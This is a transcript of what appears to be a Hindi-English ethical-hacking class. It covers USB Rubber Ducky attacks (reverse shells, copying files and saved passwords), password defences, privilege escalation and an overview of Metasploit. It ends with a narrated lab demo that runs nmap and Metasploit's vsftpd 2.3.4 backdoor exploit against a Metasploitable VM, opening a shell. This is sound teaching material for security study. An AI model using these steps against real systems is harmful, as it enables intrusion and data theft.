Okay, can you hear me? I'm audible? Yes, sir. Right, then. See, मैंने delete तो नहीं कर दिया, just a second. It's here. So let me just open this real quick. So हमने last बात कहाँ तक करी थी? If you remember, I think default password, right? Oh, it was USB. USB drive, sir. We talked about that rubber ducky. Yeah. So हमने rubber ducky के बारे में बात कर ली थी कि what rubber ducky actually is and उसका use क्या होता है, all of that. No, sir. Okay. Do you know? अच्छा ठीक है. Like you were showing some YouTube video and we got stuck. Yeah, and in the between, I think I got disconnected. That's why. Just a second. Let me share my screen again. So rubber ducky basically एक pen testing का tool है. This is a tool which a lot of pen testers use. Let me go onto the site. And this tool is first created by Hack5. Hack5 एक organization है जो आपका pen testing के tools create करती है, different tools, and you can मतलब उनके site पे जाके check कर सकते हैं आप कौन-कौन से tools available हैं. अभी हम बात करते हैं rubber ducky की क्योंकि हम USB के through attack की बात कर रहे थे, USB के through system hacking की बात करने वाले थे. तो rubber ducky के through हमें ऐसे system hacking मतलब ऐसे system का access मिल कैसे सकता है? Just a second. Yeah. So हमें रबर डकी के थ्रू सिस्टम का एक्सेस मिल कैसे सकता है? एक्चुअली रबर डकी जब हम इंसर्ट करते हैं किसी भी सीपीयू में, किसी भी सिस्टम में, तो उस सिस्टम में हम रबर डकी को ऑलरेडी स्क्रिप्ट करके रखते हैं, अपने इस कंपोनेंट को स्क्रिप्ट कर रखे रखते हैं. एंड इसको स्क्रिप्ट में हम बताते हैं कि जब भी सीपीयू के अंदर किसी भी सीपीयू के अंदर आपको प्लग किया जाएगा तो आप एक्ट करोगे कीबोर्ड की तरह. एंड हमें वैसे भी पता है कि किसी भी सिस्टम का सबसे ट्रस्टेड पार्ट कीबोर्ड होता है एंड कीबोर्ड में आप कुछ भी लिखते हैं वो आपका प्रिंट होना स्टार्ट हो जाता है. तो रबर डकी में क्या होता है कि रबर डकी में कुछ हम की स्ट्रोक्स यूज करते हैं, कीबोर्ड के स्ट्रोक यूज करते हैं और ऑटोमेटिकली हम उसको कोड प्रोवाइड करने लग जाते हैं, की स्ट्रोक्स प्रोवाइड करने लग जाते हैं. हम उसका सीएमडी खोल सकते हैं, पावर शेल खोल सकते हैं और इतनी तेज होता है, इतनी लाइटनिंग स्पीड में होता है कि इट विल टेक लाइक 2 to 3 minutes of 5 minutes टू गिव द एक्सेस. अगर मैं आपको एक रबर डकी का एग्जांपल दिखाना चाहूँ लाइव, वैसे तो मैं आपको ये चीज आईओटी में दिखाऊंगा आपको,
but I have created one rubber ducky by myself using Arduino board. Just a second, let me show you. Sir, you have any video of that? Actually वीडियो ना है तो बट फायदा नहीं है वीडियो देखने का क्योंकि मतलब उससे ज्यादा आइडिया आपको हो नहीं पाएगा बट आई विल शेयर द लिंक फॉर द वीडियोस फॉर ऑल द Yes, sir, स्पेसिफिक्स. because like I can use it for my capstone project. Okay, you are making a project on basically what? Like my core fee is cyber security, so I can take this rubber ducky as my capstone project. So if I can have any videos, then I can make it. Okay, sure. I'll just send some videos for you. You can easily make rubber ducky. I think using like this Arduino board which I have used. It was like for 100 rupees. So I bought this Arduino board and I just did some coding and it is acting as a rubber ducky. Okay, And sir. just let me show you the demo for this. Okay, I don't have the cable for the specific, I think. I don't have a cable for this right now. But let's say in the next session, I'll show you how it works. And just a second. Let me go back to the website. So basically, the work for the rubber ducky is it could actually just you have to plug it for 5 seconds. आपको बस 5 सेकंड के लिए किसी भी CPU के अंदर plug करना है, किसी भी running computer के अंदर plug करना है, and you will have the access. You will have the reverse shell. You will have the access at your own system. आपके सिस्टम के पास वो ऑलरेडी एक्सेस आ जाएगा. तो रबर डकी के और भी बहुत सारे यूज हो सकते हैं. वो डेटा एक्सफिल्ट्रेशन के लिए काम आता है. व्हाट इज डेटा एक्सफिल्ट्रेशन? एक्सफिल्ट्रेशन में क्या होता है कि आप डेटा चुराते हो, कॉपी करते हो अपने रबर डकी के अंदर. लेट्स से कि डॉक्यूमेंट्स विंडोज के अंदर डॉक्यूमेंट्स फोल्डर होता है, तो हम रबर डकी को ऐसे कोड कर सकते हैं कि जब ये प्लग होए तो जैसे प्लग होता है तो वो डॉक्यूमेंट्स फोल्डर पूरा कॉपी करके सारे जितने भी फाइल्स होंगे डॉक्यूमेंट्स फोल्डर के अंदर वो सेव कर ले अपने रबर डकी के अंदर, हम जो अनप्लग करके निकाल लेंगे एंड देन वी कैन जस्ट टेक होम. तो ये सारे पेन टेस्टिंग डिवाइसेस यूज होते हैं आपका सिस्टम एक्सेस करने के लिए. रबर डकी का और भी बहुत सारे यूज होता है. एंड जब हम आईओटी के मॉड्यूल में आएंगे, then we'll talk about all of those uses. Now let's get back to the, just a second, yeah. So that was USB drive attack. Now there's like we talked about password cracking and active online attack, passive online attack, and all of that. So there's some password cracking mitigation. Yeah, how can you like get away from all the things which we talked about earlier? So the first and the foremost thing you have to do, जो आपको सबसे पहले करनी चाहिए, जो आपको अपने डिफॉल्ट पासवर्ड चेंज रखने चाहिए. मतलब जैसे कि आप राउटर्स वगैरह नए खरीदते हैं या फिर कुछ भी चीज नए खरीदते हैं. लेट्स से कि मैंने कल सीसीटीवी इंप्लीमेंट करवाया अपने घर पे एंड दे हैव गिवन मी डिफॉल्ट यूजर नेम एंड डिफॉल्ट पासवर्ड. अब किसी के पास भी वो लॉगिन पेज का एक्सेस आ जाएगा, तो वो डिफॉल्ट पासवर्ड यूज करके डिफॉल्ट पासवर्ड एंटर करके मेरा कैमरा एक्सेस कर सकता है. सो यू हैव टू चेंज द डिफॉल्ट पासवर्ड. देन डू नॉट स्टोर सेव पासवर्ड्स एंड एप्लीकेशंस. एक और यूज होता है रबर डकी का एक्चुअली, जब आप उसको सीपीयू के अंदर इंसर्ट करते हो, प्लग करते हो, तो वो क्या करता है जितने भी आपके सिस्टम में सेव पासवर्ड होते हैं, किसी ब्राउजर में भी आपके सेव पासवर्ड होते हैं, वो सब स्टोर कहाँ होता है? आपके सिस्टम के अंदर होता है. तो रबर डकी कुछ ऐसी होती है ऑनलाइन. क्या होता है कि वो सारे जितने भी सिस्टम के पासवर्ड है एक जगह लाके आपको एक फाइल में सेव करके आपकी यूएसबी में सेव करके आपको दे सकता है. तो आपके पास सारे अकाउंट्स का पासवर्ड आ जाएगा. जैसे होता है ना ब्राउजर में आता है सेव पासवर्ड, सेव मतलब आपने फेसबुक पे लॉगिन किया तो ऊपर आ जाता है सेव पासवर्ड का नोटिफिकेशन, जैसे कि आपको बाद में एंटर ना करना पड़ जाए. बट वो जब पासवर्ड आप सेव करते हो और लेट से कि आप वो लैपटॉप कहीं ले जाते हो और किसी ने रबर डकी यूज किया, तो वो वाला पासवर्ड उसको मिल जाएगा, उसका फेसबुक का पासवर्ड आपको मिल जाएगा रबर डकी के थ्रू. देन डू नॉट यूज गेसेबल पासवर्ड. जो इजी पासवर्ड होते हैं हमें वो यूज नहीं करने चाहिए. वी शुड लाइक यूज द पासवर्ड व्हिच हैव लो अपर केस लेटर, कुछ सिंबल्स होते हैं पासवर्ड्स के अंदर, वो सारी चीजें हमें पासवर्ड्स में ध्यान रखनी चाहिए. पासवर्ड लेंथ शुड बी लाइक मोर देन 8 लेटर्स. देन आपका आता है स्टोर पासवर्ड्स इन फॉर्म ऑफ सॉल्टेड हैश. तो जो आप हैशिंग में बता रहा था कि हैशिंग होता क्या है. हैशिंग बेसिकली एक प्लेन टेक्स्ट, इट्स टॉक अबाउट हैशिंग. लेट्स से हमारे पास एक प्लेन टेक्स्ट पासवर्ड है
मेरा पासवर्ड है pass123। अब मैं अगर इसकी हैशिंग करूंगा तो हैशिंग में होता क्या है, बेसिकली हम कुछ एल्गोरिदम के थ्रू इस प्लेन टेक्स्ट को पास करते हैं और हमें एक रैंडम स्ट्रिंग जनरेट करके देता है। तो ये होता है हमारा हैशिंग। दिस इज द रैंडम स्ट्रिंग फॉर दिस स्पेसिफिक स्ट्रिंग, फॉर दिस स्पेसिफिक टेक्स्ट, फॉर दिस स्पेसिफिक पासवर्ड। सो बेसिकली ये हमारा हैशिंग होता है। तो हमें जो पासवर्ड सेव करने होते हैं वो हम हैश फॉर्म में सेव करते हैं, जिससे कि अगर लेट्स से इन फ्यूचर हैकर को आपको पासवर्ड भी मिला तो आपको पासवर्ड प्लेन टेक्स्ट में नहीं मिलेगा, एक हैशिंग में मिलेगा, और उस हैकर को पता लगाना पड़ेगा कि वो एल्गोरिदम हैशिंग के लिए यूज कौन से किया था। अगर उसे एल्गोरिदम पता लगा दे तभी जाके वो पासवर्ड को प्लेन टेक्स्ट में कन्वर्ट कर सकता है, नहीं तो उसको ये वाला पासवर्ड मिलेगा और इसका यूज कुछ नहीं होगा। फिर आपका होता है चेंज पासवर्ड्स ऑन वीकली मंथली बेसिस, जैसे आपने देख रखा है। जैसा आपने देखा है कि मैंने haveibeenpwned.com पे आपको दिखाया था कि डेटा ब्रीचेज होता है, ईमेल एड्रेस, पासवर्ड उसमें लीक हो जाता है। लेट्स से फेसबुक का लीक हुआ था, पासवर्ड 2 बिलियन यूजर नेम, ईमेल्स एंड पासवर्ड्स प्लेन टेक्स्ट में लीक हो चुके थे, और वो सब कहाँ पे, अब आपके इंटरनेट पे। तो वो सारी चीजें आप वहां से चेक कर सकते हो कि आपके पासवर्ड या फिर आपका ईमेल का स्पेसिफिक ईमेल का पासवर्ड लीक हुआ है या नहीं हुआ, एंड उसको मंथली बेसिस पे इसलिए आपको चेंज करना होता है। डिफरेंट पासवर्ड फॉर ईच सर्विस, हर सर्विस के लिए आप डिफरेंट पासवर्ड यूज कीजिए। कॉन्फ़िगर पॉलिसीज फॉर इनकरेक्ट पासवर्ड अटेम्प्ट्स, आप थोड़ा इनकरेक्ट पासवर्ड अटेम्प्ट्स जो होते हैं उनके लिए कुछ पॉलिसीज लिखिए, जैसे कि 3 पासवर्ड अटेम्प्ट कर दिया, ओके देन ही कैन नॉट ट्राई अगेन, और ये सारी चीजें। देन आपका आता है एस्केलेटिंग प्रिविलेजेस। ओके, तो हमने सिस्टम तो एक्सेस कर लिया, तो सिस्टम का एक्सेस जब हम करते हैं तो मैंने आपको बताया था 2 टाइप ऑफ यूजर्स होता है। एक आपका होता है नॉर्मल यूजर, देन सेकंड इज एक होता है आपका नॉर्मल यूजर, देन सेकंड। हाँ, Continue, sir. सॉरी फॉर दैट। हम थे प्रिविलेज एस्केलेशन पे। तो 2 टाइप ऑफ यूजर आपको मैंने बताया था, एक होता है नॉर्मल यूजर एंड एक होता है एडमिनिस्ट्रेटर। एडमिनिस्ट्रेटर के पास सब कुछ करने का एक्सेस होता है, वो आपका सिस्टम में फाइल क्रिएट कर सकता है, एग्जीक्यूट कर सकता है, डिलीट कर सकता है, सिस्टम फाइल के साथ छेड़छाड़ी कर सकता है, कुछ भी कर सकता है वो, क्योंकि वो एडमिनिस्ट्रेटर रहेगा आपके सिस्टम का। तो सेम हम एडमिनिस्ट्रेटर को लिनक्स, अगर लिनक्स सिस्टम की मैं बात करें तो एडमिनिस्ट्रेटर को हम रूट यूजर कह देते हैं या फिर सुपर यूजर कह देते हैं। तो जब कोई हैकर आपका सिस्टम का एक्सेस लेता है तो उसको आपका नॉर्मल यूजर मिलता है, क्योंकि आप जब भी आप सिस्टम में लॉगिन करते हो तो नॉर्मल यूजर के थ्रू लॉगिन करते हो। अगर आप लिनक्स में लॉगिन करते हो तो आपको देखा है कि आप काली यूजर डालते हो, रूट नहीं डालते। एंड अगर विंडोज में बात करें तो आप विंडोज में अपना यूजर का स्पेसिफिक पासवर्ड डालते हो, एडमिनिस्ट्रेटर का नहीं डालते। तो एक नॉर्मल यूजर का उनको एक्सेस मिलेगा, बट उनके पास प्रिविलेजेस बहुत कम होगी, उनके पास काम मतलब फाइल एग्जीक्यूट करने का, फाइल रीड करने की परमिशंस नहीं होगी। तो उसके लिए जो हैकर्स होते हैं वो अपना प्रिविलेज एस्केलेशन करते हैं। प्रिविलेज एस्केलेशन में मतलब वो कुछ टेक्निक्स यूज करते हैं जिससे कि जो जैसे कि उनके जो प्रिविलेजेस है ना, नॉर्मल यूजर से एडमिनिस्ट्रेटर यूजर तक बन जाए, उनके प्रिविलेजेस नॉर्मल यूजर से रूट यूजर तक हो जाए, जिससे कि बाद में वो कुछ भी कर सकते हैं आपके सिस्टम के साथ। तो 2 टाइप ऑफ प्रिविलेज एस्केलेशन होती हैं, एक होता है आपका हॉरिजॉन्टल, एक होता है आपका वर्टिकल प्रिविलेज एस्केलेशन। तो हॉरिजॉन्टल प्रिविलेज एस्केलेशन में जैसे इसमें लिखा हुआ है, द अटैकर अटेम्प्ट्स टू गेन एक्सेस टू यूजर विद सेम सेट ऑफ प्रिविलेजेस, एंड वर्टिकल में होता है द अटैकर अटेम्प्ट टू गेन एक्सेस टू यूजर विद हायर सेट ऑफ प्रिविलेजेस। इन दोनों में डिफरेंस क्या है मैं बता देता हूँ आपको, समझाता हूँ एक एग्जांपल के साथ। लेट्स से मेरे पास एक सिस्टम है जिसमें मेरे पास 5 यूजर्स हैं। ओके, एक यूजर है ए, एक यूजर बी, यूजर है सी, डी एंड ई। तो एक फाइल है मेरे पास, सिस्टम में एक फाइल है credentials.txt करके, बट वो एक्सेसिबल कौन है, रीड कौन कर सकता है उसको, डी यूजर। उसके ऊपर अंदर राइट कौन कर सकता है, डी यूजर। और उसको एग्जीक्यूट कौन कर सकता है, डी यूजर। बाकी किसी के पास भी परमिशन नहीं है उस यूजर के साथ कुछ भी करने की। तो हॉरिजॉन्टल प्रिविलेज एस्केलेशन में हम यूजर्स पे अटैक करते हैं, जो नॉर्मल यूजर है। हम और जो लेट्स से कि मैंने जो सिस्टम का एक्सेस लिया वो मैंने ए यूजर का एक्सेस लिया है। अब मेरे को हॉरिजॉन्टल प्रिविलेज एस्केलेशन में क्या करना है कि मेरे को डी यूजर का एक्सेस लेना है। तो मैं एक एक करके क्या करूंगा, हॉरिजॉन्टली ही मैं पहले बी यूजर का एक्सेस लूंगा, देन सी का लूंगा, एंड देन लास्ट में डी का लूंगा। एंड जब मेरे पास डी का यूजर एक्सेस आ जाएगा, देन आई कैन ओपन दैट स्पेसिफिक credential.txt फाइल।
हम इसमें डायरेक्टली हम रूट यूजर के पास नहीं जा रहे, रूट एक्सेस के पास नहीं जा रहे, एडमिनिस्ट्रेटर एक्सेस के पास नहीं जा रहे। बट हम अगर वर्टिकल प्रिविलेज एस्केलेशन की बात करते हैं, वर्टिकल प्रिविलेज एस्केलेशन में क्या होता है, मैं ए यूजर हूँ, मैं बी सी डी ई इन सारे यूजर्स को देखूंगा ही नहीं, मैं सीधा सीधा ट्राई करूंगा कि सीधा सीधा मैं रूट यूजर पे पहुंच जाऊं, मैं एडमिनिस्ट्रेटर यूजर पे पहुंच जाऊं। तो ये आपका होता है वर्टिकल प्रिविलेज एस्केलेशन। इसके बहुत डिफरेंट डिफरेंट टेक्निक्स हैं, बहुत सारे सिस्टम मिसकॉन्फ़िगरेशन के थ्रू आप अपने प्रिविलेज एस्केलेट कर सकते हो। बहुत सारे टेक्निक्स बताए हैं ऑनलाइन रिसर्चर्स ने, और जब हम प्रिविलेज एस्केलेशन की बात करेंगे तब हम वो सारे टेक्निक्स यूज करेंगे डिफरेंट डिफरेंट। फिर हम बात करते हैं मेटास्प्लॉइट की। तो आपने देखा था कि अब चलो मेटास्प्लॉइट का मैं इंट्रोडक्शन दे देता हूँ। सो मेटास्प्लॉइट एक्चुअली है क्या? मेटास्प्लॉइट एक आपका पेंट है। हाँ जी बोलिए। हेलो। ओके। सो मैं मेटास्प्लॉइट की बात करता हूँ। तो मेटास्प्लॉइट बेसिकली है क्या? मेटास्प्लॉइट आपका एक पेन टेस्टिंग फ्रेमवर्क है जो आपको वल्नरेबिलिटीज का इन्फॉर्मेशन वो बताता है, वल्नरेबिलिटीज के बारे में इन्फॉर्मेशन प्रोवाइड करता है। वो आपका पेलोड भी क्रिएट करता है, और वो आपको हेल्प करता है उन पेलोड के थ्रू एक्सप्लॉइट करने का, सिस्टम के अंदर एक्सेस लेने का। इवन दो आपके लिए ये वायरसेस मालवेयर वगैरह डिजाइन कर सकता है। तो मेटास्प्लॉइट एक बहुत अच्छा, बहुत पावरफुल फ्रेमवर्क है, एंड बहुत सारे सिक्योरिटी रिसर्चर्स इसको यूज करते हैं पेन टेस्टिंग के अंदर। अगर आप वीएपीटी वगैरह देखोगे तो उसके अंदर भी बहुत सारे लोग इन चीजों को, मेटास्प्लॉइट फ्रेमवर्क को यूज करते हैं। एंड ये जो मेटास्प्लॉइट फ्रेमवर्क है, इसको रैपिड 7 कंपनी है, इसने बनाया है। आप जब सिक्योरिटी के बारे में थोड़ा न्यूज वगैरह देखोगे तो आपको आइडिया हो जाएगा रैपिड 7 कंपनी क्या करती है। देन मेटास्प्लॉइट के अंदर कुछ मॉड्यूल्स होते हैं जिनके ऊपर लोग वर्क करते हैं। तो जितने भी मॉड्यूल्स हैं वो यहाँ पे हैं आपके। पहला होता है आपका एक्सप्लॉइट्स। एक्सप्लॉइट्स में आपके पास एक्सप्लॉइट्स होते हैं कि क्या क्या डिफरेंट डिफरेंट एक्सप्लॉइट्स हैं जो लाइक लेट्स से जितने भी वल्नरेबल मशीन पास्ट में आ रखे हैं उन सबके एक्सप्लॉइट्स इन्होंने स्टोर कर रखे हैं एक एक करके मेटास्प्लॉइट के अंदर। तो आप हर एक एक्सप्लॉइट्स चेक कर सकते हो कि कोई स्पेसिफिक वल्नरेबिलिटी पे चलेगा या नहीं चलेगा। देन आपके पास पेलोड्स होता है। पेलोड्स आपके पास डिफरेंट डिफरेंट पेलोड्स होता है डिफरेंट डिफरेंट सिस्टम के लिए। लेट्स से विंडोज का पेलोड आपको चाहिए, या फिर लिनक्स का चाहिए, या मैक ओएस का चाहिए, सारे पेलोड्स आपको यहाँ पे मिल जाएंगे। देन आपका होता है ऑक्सिलरी। ऑक्सिलरी आपका स्कैनिंग में आता है। इवन आप मेटास्प्लॉइट्स के थ्रू भी आप स्कैनिंग परफॉर्म कर सकते हो। पोर्ट स्कैनिंग करनी है आपको, वल्नरेबिलिटी स्कैनिंग करनी है, आप मेटास्प्लॉइट के थ्रू परफॉर्म कर सकते हो। तो वो आपके ऑक्सिलरी मॉड्यूल्स में आता है। फिर आपका था पोस्ट। पोस्ट मॉड्यूल में क्या है, जैसे हमने अभी पढ़ा है ना ऊपर प्रिविलेज एस्केलेशन, पोस्ट मॉड्यूल तब आता है जब आप एक्सेस ले लो तो सिस्टम का। फिर आप पोस्ट मॉड्यूल के अंदर बहुत सारे डिफरेंट डिफरेंट आपके मॉड्यूल्स होते हैं, डिफरेंट डिफरेंट टेक्निक्स होते हैं, वो आप यूज करते हो। तो वो सब चीज आपकी आती है पोस्ट मॉड्यूल के अंदर। पोस्ट एक्सप्लॉइटेशन भी कहते हैं इस चीज को। फिर आपका आता है एनकोडर्स एंड इवेजन। एनकोडर्स एंड इवेजन आपका वहां काम आता है जहां पे आपको अपना खुद का एक वायरस क्रिएट करते हो, एक पेलोड क्रिएट करते हो, जिससे कि वो जाके विंडोज में या फिर लिनक्स सिस्टम में चले। और अगर वहां पे कोई एंटीवायरस हो या फिर कोई डिफेंडर वगैरह हो तो वहां पे जाके उसको इवेड कर दे, मतलब एंटीवायरस डिटेक्ट ना कर पाए उसको, या फिर आपका आईडीएस डिटेक्ट ना कर पाए, या फिर आप कोई फायरवॉल लगा हुआ है वो डिटेक्ट ना कर पाए। तो एनकोडर्स और इवेजन के मॉड्यूल्स वहां यूज होते हैं। फिर आपका आता है नॉप्स। नॉप्स मॉड्यूल आपको अभी ज्यादा देखने की जरूरत नहीं। नॉप्स मॉड्यूल वहां रिवर्स इंजीनियरिंग में काम आता है और असेंबली कोड लैंग्वेज में काम आता है। नो ऑपरेशन बोलते हैं इनको। तो हम एक बार प्रैक्टिकल सेशन देख लेते हैं सिस्टम हैकिंग का। जस्ट अ सेकेंड, लेट मी शेयर माय स्क्रीन। तो मेटास्प्लॉइट काली के अंदर प्री इंस्टॉल आता है। आपको सीधा सीधा उसको एक्सेस करने के लिए एमएसएफ console लिखना पड़ेगा। इट विल टेक सम टाइम टू लोड। आप देख सकते हैं यहाँ पे आप मेटास्प्लॉइट console के अंदर आ गए, एंड आप एक टर्मिनल आपका चेंज हो चुका है MSF6 एंड देन ग्रेटर देन साइन। एंड यहाँ पे आपको कमांड्स लिखने हैं, अपने कोई भी कमांड्स आप लिख सकते हैं। तो अगर आपको कमांड्स के बारे में पता करना है मेटास्प्लॉइट में कौन कौन सी कमांड्स यूज होती हैं, आप क्वेश्चन मार्क प्रेस कीजिए एंड देन एंटर। आपको सारे कमांड्स के बारे में यहाँ पे बता देगा, और टेक्निक्स डिफरेंट डिफरेंट बता देगा क्या क्या टेक्निक्स आप यूज कर सकते हैं। डीबी कनेक्ट, डीबी एनमैप कर सकते हैं, इंपोर्ट एक्सपोर्ट, एंड जॉब स्केल, और ये सारी कमांड्स हम यूज कर सकते हैं।
अगर आपको एक्सप्लॉइट्स के बारे में सर्च करना है, आप सीधा सीधा सर्च एक्सप्लॉइट्स कर सकते हैं। आप देख सकते हैं इसने मेरे को 1787 एक्सप्लॉइट्स दे दिए हैं। Sir, will we have any deep discussion on Metasploit in coming classes? या श्योर, जब हम सिस्टम के एक्सेस लेंगे एंड पोस्ट एक्सप्लॉइटेशन करेंगे तो मेटास्प्लॉइट के थ्रू करेंगे हम, एंड इवन दो हम जब पेलोड क्रिएट करेंगे तो वो मेटास्प्लॉइट के थ्रू ही होगा। सो आप देख सकते हैं डिफरेंट डिफरेंट एक्सप्लॉइट्स हैं। विंडोज के लिए एक्सप्लॉइट्स है, स्पेसिफिक सर्विसेज के लिए एक्सप्लॉइट है, एसएमबी सर्विस के MS07, 06। आपको लिनक्स के लिए सर्च करना है, आप सीधा सीधा सर्च लिनक्स एंड आपके लिए डिफरेंट डिफरेंट मॉड्यूल्स देगा। पोस्ट मॉड्यूल में लिनक्स के लिए मैनेज आ रहा है, सूडो आ रहा है। देन ऊपर आप थोड़ा स्क्रॉल करोगे तो आपको पेलोड्स दिखेंगे लिनक्स के लिए, x64 मेटापेटर रिवर्स टीसीपी कनेक्शन चाहिए अगर आपको तो। लेट मी क्लियर द स्क्रीन। ओके, सो ये सारी चीजें स्टोर कहाँ पे हैं? जस्ट अ सेकंड, लेट मी शो यू। तो अगर आप करेंगे यूजर शेयर मेटास्प्लॉइट फ्रेमवर्क, आप देख सकते हैं डबल टैप करके कि ये सब चीजें स्टोर हैं कहाँ पे। एंड लेट मी चेक मॉड्यूल्स, एंड डबल टैब में आपके पास सारे मॉड्यूल्स आ जाएंगे, ऑक्सिलरी, एनकोडर, रिवीजन, जिनकी हमने अभी बात करी। तो लेट्स चेक फॉर एक्सप्लॉइट्स, कौन कौन से एक्सप्लॉइट्स अवेलेबल हैं। एंड यू कैन सी फॉर एंड्रॉइड, FreeBSD, मल्टीवेयर, OS X, विंडोज, सोलारिस, मेनफ्रेम, लिनक्स, इन सब चीज के लिए एक्सप्लॉइट्स आपके पास अवेलेबल हैं। विंडोज के एक्सप्लॉइट्स की बात करें, डबल टैप करें तो आपको दिख जाएगा किस किस के टाइप को आपको एक्सप्लॉइट्स चाहिए। SSH का चाहिए, RDP का चाहिए, एंटीवायरस का चाहिए, ब्राउजर का चाहिए। तो मेटास्प्लॉइट बहुत वास्ट एरिया है आपका, और पेन टेस्टिंग में बहुत यूज किया जाता है मेटास्प्लॉइट को। अभी लेट मी स्टार्ट माय मेटास्प्लॉइटेबल मशीन। अच्छा, एक चीज और, जस्ट अ सेकेंड। लेट मी स्टार्ट फायरफॉक्स। तो आप लोगों ने पहला टास्क किया था जो मैंने आपको टास्क दिया था लिनक्स कमांड्स का, किसी ने ट्राई किया था? Yes, sir. I completed. ओके, कंप्लीट कर दिया तारा। ओके, सो मेरे को एक दूसरा टास्क देना है आज। तो आपके पास दो ऑप्शंस हैं, या तो मैं मेटास्प्लॉइट का एक्सेस लेके दिखाऊं, या फिर मैं ये जो मशीन है ब्लू करके, मैं इसका एक्सप्लॉइट करके देखूं। तो आप बता दिए कौन सा मेरे को मतलब परफॉर्म करना है, क्योंकि जो मैं परफॉर्म नहीं करूंगा वो आपको घर जाके उसका एक्सेस लेना पड़ेगा। Sir, I think you can go with the easiest one which we can understand. Which you can understand. So I should go for Metasploit, right? Yes, sir. Okay, so I will take the access for this Linux machine, which is Metasploitable too. So let me go back to the Kali. And as you know, हमने जब nmap किया था Metasploitable की machine पे, तो we got some results, right? हमने results देखे थे. I have to check. No, I won't log in because हमें login ही break करना है इस machine का. So it's down. Let me check the IP for this. And here's my IP, which is 48. Okay, so I'll do -SV and then 48. So I'm using this -SV for service version. Let me open my another terminal, which is, okay, this is Metasploitable terminal. Okay, so you can see, okay, I didn't get the results yet. Just a second. Okay, I got the results. एंड यू कैन सी हमें वर्जन स्पेसिफिक पता चल गया है कि कौन कौन से मतलब जो सर्विस चल रही है, FTP चल रही है, उसका वर्जन क्या है, SSH चल रहा है उनका वर्जन क्या है, टेलनेट चल रहा है उनका वर्जन क्या है। एंड with that knowledge we can search for exploits, we can search for payloads. So अगर हम मेटास्प्लॉइट में जाते हैं, पहले हम यूज करते हैं ऑक्सिलरी मॉड्यूल। ओके, सो ऑक्सिलरी मॉड्यूल में हमें क्या करना पड़ेगा? सर्च, नो, वी कैन जस्ट डायरेक्टली डू यूज ऑक्सिलरी। एंड हमें ऑक्सिलरी मॉड्यूल देखना है, हमें स्कैन करना है, तो हम स्कैनर यूज करेंगे। स्कैन हमें किसका करना है? लेट्स से FTP के लिए स्कैन करना है। तो आप डबल टैप करोगे तो आपको दिख जाएगा डिफरेंट डिफरेंट मॉड्यूल्स आपके पास अवेलेबल हैं, विच इज FTP anonymous स्कैन, FTP लॉगिन स्कैन, ये इवन लॉगिन ट्राई करेगा स्कैन पे।
या फिर FTP का वर्जन हमें स्कैन करना है, या फिर डिफरेंट डिफरेंट चीजों के लिए डिफरेंट डिफरेंट मॉड्यूल्स दे रखे हैं, तो हमें अभी FTP का वर्जन स्कैन करना है। तो लेट्स गो विद FTP वर्जन एंड देन जस्ट प्रेस एंटर। नाउ मेटास्प्लॉइट ने क्या किया है, मेटास्प्लॉइट ने मेरा ये मॉड्यूल जो है इसने लोड कर दिया है, एंड नाउ यू कैन सी। तो हमें ये मॉड्यूल रन करने के लिए क्या करना पड़ेगा, हमें ऑप्शंस कुछ सेट करने पड़ेंगे। सो लेट्स सी द ऑप्शंस विद द कमांड ऑप्शंस। तो ऑप्शंस कमांड कर लिख के एंटर मारते हो तो आप देख सकते हो यहाँ पे नेम, करंट सेटिंग्स, रिक्वायर्ड एंड डिस्क्रिप्शन। तो इसमें जो रिक्वायर्ड है उसमें हमें वो फिल करना होता है, हमें वो एंट्रीज फिल करनी होती है जो रिक्वायर्ड एंट्रीज हैं। एंड वी कैन सी थ्रेड्स इज ऑलरेडी फिल्ड विद 1 and our port is 21. What is our port and our host? Our port and our host stands for remote port and remote host. And इसका मतलब क्या है, इसका मतलब it's asking for that the target host and the target port, the target IP and the target port. So as we can see through the nmap, it's on port 21, or even we can just we are just looking for it, we are just scanning it. So it's port 21, of course, because we are scanning for FTP, and as we know, FTP's common port is port 21. अगर हम आर होस्ट की बात करते हैं, आर होस्ट हमारा, हमें आईपी चेक करना पड़ेगा मेटास्प्लॉइटेबल का, यहाँ पे हमें आईपी डालना पड़ेगा। सो मेटास्प्लॉइटेबल का आईपी हमने अभी चेक किया था, विच वाज आई थिंक 48। just a second, I have to write set r hosts and then press enter. Now if you will check options, you can see हमारा ने r host इसको दे दिया है। Now you just have to run this module, आपको बस run कमांड से मॉड्यूल रन करना है, एंड ये मॉड्यूल रन हुआ एंड यू कैन सी इसने हमें वर्जन स्कैन करके, ये स्पेसिफिक वर्जन स्कैन करके हमारे लिए सामने फ्रंट पे रख दिया है। नाउ वी हैव टू एक्सप्लॉइट दिस वर्जन। हम वो एक्सप्लॉइट कैसे करेंगे? यू कैन यूज सर्च मॉड्यूल एंड दिस वर्जन। लेट मी गो विद VSFT PD ओनली। सो इसमें क्या होगा कि मेटास्प्लॉइट में अगर कोई एक्सप्लॉइट होगा VSFT PD के लिए, स्पेसिफिक एक्सप्लॉइट, तो ये सब कुछ सब मतलब सब में सर्च करके मेरे को रिजल्ट लाके दे देगा कि कोई एक्सप्लॉइट है या नहीं। Then I'll press enter and I can see एक exploit available है, which is VSFT PD 234 backdoor. So let's use this exploit. Use exploit Unix FTP VSFTPD backdoor. And now you can see पहले मेरा auxiliary loaded था, अब मेरा exploit load हो चुका है। You have to check for options, and options में इसने मेरे से क्या क्या मांगा है, R host मांगा है मेरे से, एंड आर पोर्ट ऑलरेडी गिवन 21। अगर कोई दूसरा पोर्ट यूज करता है, लेट्स से आपका FTP आपने स्कैन किया nmap के थ्रू एंड देखा कि वहां पे जो FTP है वो पोर्ट 8080 यूज कर रहा है, तो आपको यहाँ पे सेट आर पोर्ट 8080 करना था, सेट आर पोर्ट 8080। बट अभी पोर्ट 21 यूज कर रहा है एंड इट्स ऑलरेडी डिफाइंड, तो हमें उसको चेंज करने की जरूरत नहीं है। तो हम सीधा सीधा आर होस्ट एंड IP दे देते हैं, विच इज 1.48 क्लियर करते हैं। फिर इसके बाद रन कमांड से हम ये अपना एक्सप्लॉइट रन करते हैं। तो आप देख सकते हैं ये बैकएंड में एक्सप्लॉइट हमारा रन कर रहा है, एंड नाउ इट सेज फाउंड शेल, कमांड शेल सेशन 1 ओपन। तो हमारे एक शेल ना ओपन हो चुका है, मतलब हमें एक्सेस मिल चुका है अपने मेटास्प्लॉइटेबल सिस्टम का, इस वाले सिस्टम का हमें एक्सेस मिल चुका है। अगर आप यहाँ पे कमांड्स लिखते हैं, लेट्स से ls लिखते हैं, तो आप देख सकते हैं थोड़े बहुत 